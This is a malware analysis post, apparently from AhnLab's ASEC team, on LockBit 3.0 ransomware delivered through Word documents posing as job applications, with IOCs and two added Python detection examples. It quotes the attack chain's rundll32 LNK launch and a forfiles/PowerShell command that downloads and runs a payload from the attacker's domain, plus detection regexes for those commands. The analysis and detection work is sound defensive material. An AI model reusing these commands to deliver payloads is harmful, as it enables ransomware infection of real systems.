LockBit 3.0 Ransomware Distributed via Word Documents

The ASEC analysis team has identified that LockBit 3.0 ransomware distributed while disguised as job application emails in NSIS format is also being distributed in Word document format. The specific distribution channel has not yet been identified, but considering that the distributed file names include names of people such as ‘Lim Gyu Min.docx’ or ‘Jeon Chae Rin.docx’, it is likely that they were distributed disguised as job applications, similar to the past cases.

The Word document contains an external link in its word/_rels/settings.xml.rels file. When the document is opened, this link makes the user's PC access hxxp://ppaauuaa11232[.]cc/dlx5rc.dotm and download an additional dotm file.

Figure 1. settings.xml.rels
Figure 2. URL access screen when the Word document is executed
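The relationship file named above is easy to inspect without opening the document: a .docx is a zip archive, and every `.rels` part lists relationships whose `TargetMode="External"` can point at a remote host. The following is an added example, not code from ASEC or the original post, showing a triage check that unpacks a document in memory and reports such relationships. The relationship type `attachedTemplate` and the placeholder host `template-host.invalid` are assumptions for the constructed sample document; the post only names the downloaded file.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
# Targets with these prefixes resolve outside the package and outside the host.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "\\\\")


def find_external_relationships(docx_bytes):
    """Return [(rels_part, short_type, target)] for every relationship whose
    TargetMode is External and whose Target points at a remote location."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # a malformed .rels part deserves its own alert in production
            for rel in root.iter(RELS_NS + "Relationship"):
                target = rel.get("Target", "")
                if (rel.get("TargetMode") == "External"
                        and target.lower().startswith(REMOTE_PREFIXES)):
                    short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, short_type, target))
    return hits


def is_remote_template_injection(docx_bytes):
    """True when word/_rels/settings.xml.rels attaches a template from a
    remote host, the layout described for the documents in this post."""
    return any(part == "word/_rels/settings.xml.rels" and rtype == "attachedTemplate"
               for part, rtype, _ in find_external_relationships(docx_bytes))


def build_sample_docx(template_target):
    """Constructed minimal .docx (not a real sample) whose settings.xml.rels
    attaches a template at template_target."""
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{template_target}" TargetMode="External"/>'
        '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns='
                    '"http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/settings.xml", "<settings/>")
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    suspicious = build_sample_docx("http://template-host.invalid/dlx5rc.dotm")
    for part, rtype, target in find_external_relationships(suspicious):
        print(f"{part}: {rtype} -> {target}")
    print("remote template:", is_remote_template_injection(suspicious))
```

A locally attached template (a `file:///` path to the user's own Normal.dotm) is not reported, so the check separates the remote-template case from ordinary documents; in a mail gateway the same function can be run over every attachment before delivery.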

The document file contains an image that prompts the use of a macro script. The downloaded dlx5rc.dotm contains a VBA macro, and when the user clicks Enable Content, the malicious macro script is executed.

Figure 3. Word File
Figure 4. Document properties

The VBA macro code inside the dotm file is as follows.

Figure 5. Malicious VBA macro code

The strings in the code are obfuscated, and the code uses the CLSID 72C24DD5-D70A-438B-8A42-98424B88AFB8. When the VBA macro runs, it creates a file named skeml.lnk in the C:\Users\Public\ folder. The TargetPath of the link file is forfiles.exe, and the link file itself is launched through rundll32.exe. The command that executes the link file is as follows.

  • rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk

When the link file is executed, a PowerShell command downloads an additional malicious file from hxxp://ppaauuaa11232[.]cc/aaa.exe, saves it as C:\Users\Public\156498415616651651984561561658456.exe and then runs it. The command executed via the LNK file is as follows.

  • forfiles.exe /p c:\windows\system32 /m notepad.exe /c ""cmd /c powershell/W 01 curl hxxp://ppaauuaa11232.cc/aaa.exe -o C:\Users\Public\156498415616651651984561561658456.exe;C:\Users\Public\156498415616651651984561561658456.exe"

Figure 6. RAPIT process tree
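The process chain above (rundll32 loading url.dll to open a .lnk, forfiles used as a launcher, PowerShell downloading into C:\Users\Public and executing the result on the same line) is distinctive enough to detect from process-creation telemetry. The following is an added example, not code from ASEC or the original post: three rules run over constructed Sysmon-style events, plus an ancestry check that ties the PowerShell process back to the rundll32 parent. The event fields, the process IDs and the placeholder host `download-host.invalid` are constructed; the real domain from the post is deliberately not reproduced.

```python
import re

PAYLOAD = r"C:\Users\Public\156498415616651651984561561658456.exe"
DOWNLOAD = "powershell /W 01 curl http://download-host.invalid/aaa.exe -o " + PAYLOAD + ";" + PAYLOAD

# Constructed process-creation events (pid, ppid, image, command line); not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 20, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\forfiles.exe",
     "cmd": r'forfiles.exe /p c:\windows\system32 /m notepad.exe /c "cmd /c ' + DOWNLOAD + '"'},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd /c " + DOWNLOAD},
    {"pid": 103, "ppid": 102, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": DOWNLOAD},
    # Benign administrative use of forfiles: must not fire.
    {"pid": 104, "ppid": 20, "image": r"C:\Windows\System32\forfiles.exe",
     "cmd": r'forfiles /p C:\logs /m *.log /d -30 /c "cmd /c del @path"'},
]

RULES = {
    # rundll32 asked to load url.dll and "open" a shortcut: the LNK is launched by proxy.
    "rundll32_openurl_lnk": re.compile(
        r"rundll32(?:\.exe)?\s+url\.dll\s*,\s*openurl\b.*\.lnk\b", re.I),
    # forfiles whose /c payload reaches PowerShell or a download tool rather than a file operation.
    "forfiles_proxy_exec": re.compile(
        r"forfiles(?:\.exe)?\b.*?/c\s+.*?\b(?:powershell|pwsh|curl)\b", re.I),
    # PowerShell downloads into the world-writable Public folder and runs that same path.
    "ps_download_exec_public": re.compile(
        r"powershell.*?\b(?:curl|iwr|wget|invoke-webrequest)\b.*?-o(?:utfile)?\s+"
        r"(c:\\users\\public\\\S+?\.exe).*?;\s*\1", re.I),
}


def detect(events):
    """Return {pid: [rule names]} for every event whose command line matches a rule."""
    hits = {}
    for ev in events:
        names = [name for name, rx in RULES.items() if rx.search(ev["cmd"])]
        if names:
            hits[ev["pid"]] = names
    return hits


def lnk_to_powershell_chain(events):
    """Return pids of PowerShell processes whose ancestry contains forfiles.exe
    beneath a rundll32 url.dll,OpenURL parent: the full chain from the post."""
    by_pid = {ev["pid"]: ev for ev in events}
    found = []
    for ev in events:
        if "powershell" not in ev["image"].lower():
            continue
        ancestors, cur = [], by_pid.get(ev["ppid"])
        while cur is not None:
            ancestors.append(cur)
            cur = by_pid.get(cur["ppid"])
        images = [a["image"].lower().rsplit("\\", 1)[-1] for a in ancestors]
        if ("forfiles.exe" in images
                and any(RULES["rundll32_openurl_lnk"].search(a["cmd"]) for a in ancestors)):
            found.append(ev["pid"])
    return found


if __name__ == "__main__":
    for pid, names in detect(SAMPLE_EVENTS).items():
        print(pid, names)
    print("full chain on pids:", lnk_to_powershell_chain(SAMPLE_EVENTS))
```

The per-event rules fire on their own, which is useful when telemetry is partial; the ancestry check is the higher-confidence signal because a legitimate forfiles job (the cleanup on pid 104) never has rundll32 url.dll,OpenURL as a parent.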

At the time of analysis, the downloaded 156498415616651651984561561658456.exe file was LockBit 3.0 ransomware in NSIS form.

Figure 7. Desktop after ransomware infection

As LockBit ransomware is being distributed through various methods, users are advised to be cautious. Users should update the applications they use and V3 to the latest version and refrain from opening document files from unknown sources.

[File Detection]
Downloader/DOC.External
Downloader/XML.External
Downloader/LNK.Powershell
Ransomware/Win.LockBit

[Behavior Detection]
Malware/MDP.Download.M1197
Execution/MDP.Powershell.M1201
Ransom/MDP.Decoy.M1171

[IOC Info]
2d8b6275dee02ea4ed218ba2673b834e (docx)
97c07d03556ddcfc8ebfa462df546eb5 (docx)
45dfdde3df07b6ccc23b7ae6e3dc1212 (docx)
77c5fb080bf77f099c5b5f268dcf4435 (dotm)
738bee5280d512a238c3bb48c3278f63 (lnk)
7b74e4fb9a95f41d5d9b4a71a5fe40b9 (exe)
hxxp://ppaauuaa11232[.]cc/dlx5rc.dotm
hxxp://ppaauuaa11232[.]cc/aaa.exe

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

5 Comments
trackback

[…] Recently, researchers discovered that LockBit 3.0 ransomware is being delivered in Word document format while masquerading as job application emails in NSIS format. […]

trackback

[…] LockBit 3.0 Ransomware Distributed via Word Documents Comments are closed. […]

trackback

[…] observed two other distribution methods: one uses a DOTM document containing a malicious VBA macro, and the other a ZIP containing malware in NSIS format […]

trackback

[…] September 2022, AhnLab observed another two methods of LockBit 3.0 distribution, one using DOTM documents with malicious VBA macro and one dropping ZIP files containing the malware in NSIS […]

trackback

[…] Researchers discovered that LockBit 3.0 ransomware is being delivered in Word document format while masquerading as job application emails in NSIS format. […]